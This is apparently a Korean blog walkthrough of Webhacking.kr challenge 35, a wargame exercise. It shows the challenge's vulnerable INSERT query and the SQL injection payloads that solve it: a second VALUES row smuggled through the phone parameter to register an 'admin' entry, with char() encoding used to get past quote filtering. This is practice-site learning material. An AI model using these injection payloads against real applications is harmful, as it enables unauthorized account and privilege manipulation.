Webhacking.kr 35번 문제 풀이~


35번 문제 클릭해보자


350점 짜리~



그럼 아래와 같은 화면이 나오는뎅



index.phps 버튼을 클릭해보면 아래와 같이 쿼리가 날라가도록 되어있고


id가 admin이고 ip가 REMOTE_ADDR과 같으면 문제가 풀린당



한 번 1을 입력해 보았다


그럼 소스보기에 입력한 ID와 Phone 번호가 주석처리되어서 나타난다



쿼리문을 분석해보면


insert into challenge35_list(id,ip,phone) values('$_SESSION[id]','$_SERVER[REMOTE_ADDR]',$_GET[phone])


$_GET[phone] 위치에 내가 입력할 수 있는 공간이기 때문에 거기에


insert into ~~~ values('id','ip','phone'),('admin','ip','phone')


이런식으로 values에 2가지를 입력이 가능하다


$_GET[phone] 위치에 phone1),('admin','IP',phone2


를 입력해주면 될 듯 하다


한 번 해보면


1),('admin','자신의IP',2



쿼리 에러가 난다



다시 살펴봐도 맞는거 같다..


하지만 쿼리 에러가 나는거 보면 PHP 기능 중 입력값의 " ' " 이걸 없애주는


기능이 켜져 있는거 같다


" ' " 이걸 인식 시켜주기 위해 char을 이용하였다


2),(char(97,100,109,110),char( 자신의 IP ),2


Congratulation!




350점을 획득하였당ㅋㅋ


이렇게 또 35번 문제 클리어하였당